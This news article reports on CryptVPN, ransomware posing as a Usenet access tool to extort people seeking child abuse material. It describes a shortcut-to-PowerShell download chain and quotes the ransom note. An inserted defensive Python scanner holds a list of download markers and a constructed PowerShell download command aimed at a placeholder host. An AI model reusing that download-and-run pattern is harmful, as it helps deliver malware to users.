Hacker: Malware Targets Individuals Seeking Child Pornography

Researchers have discovered a malicious campaign targeting people who actively search for child pornography online. CryptVPN malware operators extort money from pedophiles.

Hackers have long tried to combat the spread of child pornography in their own way. Various malware and ransomware strains targeting pedophiles began appearing back in the 2010s. For example, one of the first ransomware families of this kind, Anti-Child Porn Spam Protection (ACCDFISA), was initially an ordinary locker that blocked the Windows desktop; later versions added file encryption.

Another example is the high-profile 2017 attack on the darknet hosting provider Freedom Hosting II. At that time, 10,613 .onion sites were compromised, the attack affected 15-20% of the entire darknet, and the hackers stated that it was revenge for the mass posting of child pornography.

As Bleeping Computer now reports, last week the information security researcher MalwareHunterTeam discovered a sample of a malicious executable named CryptVPN, which targets pedophiles.

After studying the malware, researchers came to the conclusion that the hackers created a special website posing as UsenetClub, a subscription service that supposedly provides access to Usenet images and videos without censorship. Unfortunately, Usenet is indeed considered a well-known source of child pornography these days.

The fake site offers three subscription levels: two paid subscriptions ranging from $69.99 per month to $279.99 per year, plus a third option that claims to provide free access but requires the user to install the free CryptVPN software and use it for access.

If a user downloads the CryptVPN.zip archive from the site, they will find inside it a shortcut named CLICK-HERE-TO-INSTALL. The shortcut actually points to PowerShell.exe, with arguments that download the executable CryptVPN.exe, save it as C:\Windows\Tasks.exe, and then execute it.
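A defender-side triage sketch for the delivery step described above, added here as an example and not taken from the researchers or Bleeping Computer: it scans a ZIP archive for .lnk members and flags shortcuts that reference PowerShell together with download markers. It is a string heuristic rather than a full Shell Link parse, and the marker list, the size cap and the sample archive are assumptions constructed for illustration.

```python
import io
import zipfile

# Shell Link header per MS-SHLLINK: HeaderSize 0x4C, then the LinkCLSID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
MAX_LNK_SIZE = 1 << 20  # shortcuts are tiny; assumed cap for this example
# Heuristic markers chosen for this example; tune for your environment.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "start-bitstransfer", "http://", "https://")


def triage_lnk(blob: bytes) -> list[str]:
    """Return reasons a shortcut looks like a script downloader (empty if none)."""
    if not blob.startswith(LNK_MAGIC):
        return []
    # LNK strings are ANSI or UTF-16LE; dropping NULs folds both into one view.
    text = (blob + b"\n" + blob.replace(b"\x00", b"")).decode("latin-1").lower()
    if "powershell" not in text and "pwsh" not in text:
        return []
    hits = [f"download marker: {m}" for m in DOWNLOAD_MARKERS if m in text]
    return ["targets PowerShell"] + hits


def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Map each flagged .lnk member of a ZIP archive to the reasons it was flagged."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            if info.file_size > MAX_LNK_SIZE:
                findings[info.filename] = ["oversized shortcut, not parsed"]
                continue
            reasons = triage_lnk(zf.read(info))
            if reasons:
                findings[info.filename] = reasons
    return findings


def constructed_sample() -> bytes:
    """Constructed archive: one downloader-style shortcut and one benign one."""
    header = LNK_MAGIC.ljust(0x4C, b"\x00")
    args = "powershell.exe -c Invoke-WebRequest https://example.invalid/x"
    bad = header + args.encode("utf-16-le")
    good = header + r"C:\Program Files\App\app.exe".encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("CLICK-HERE-TO-INSTALL.lnk", bad)
        zf.writestr("App.lnk", good)
    return buf.getvalue()
```

Calling `scan_zip(constructed_sample())` flags only the downloader-style shortcut; a mail or web gateway could run the same check on archives before they reach users.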

The malware executable is packed with UPX, but once unpacked it contains a PDB string indicating that the author himself named the malware PedoRansom.

Researchers write that there is nothing remarkable in the program itself: it only replaces the victim’s desktop wallpaper with an extortion message and leaves a similar ransom note in a README.TXT file.

“You were looking for material related to child exploitation and/or sexual abuse. You were so stupid that you were hacked,” the message reads. “We have collected information about you, and now you must pay us a ransom, otherwise your life is over.”

The note goes on to say that the person must pay $500 to the Bitcoin address bc1q4zfspf0s2gfmuu8h5k0679sxgxjkd7aj5e6qyl within ten days, otherwise their information will be leaked. So far, only $86 has been received at this address, and researchers doubt that the CryptVPN operators will be able to “earn” much more.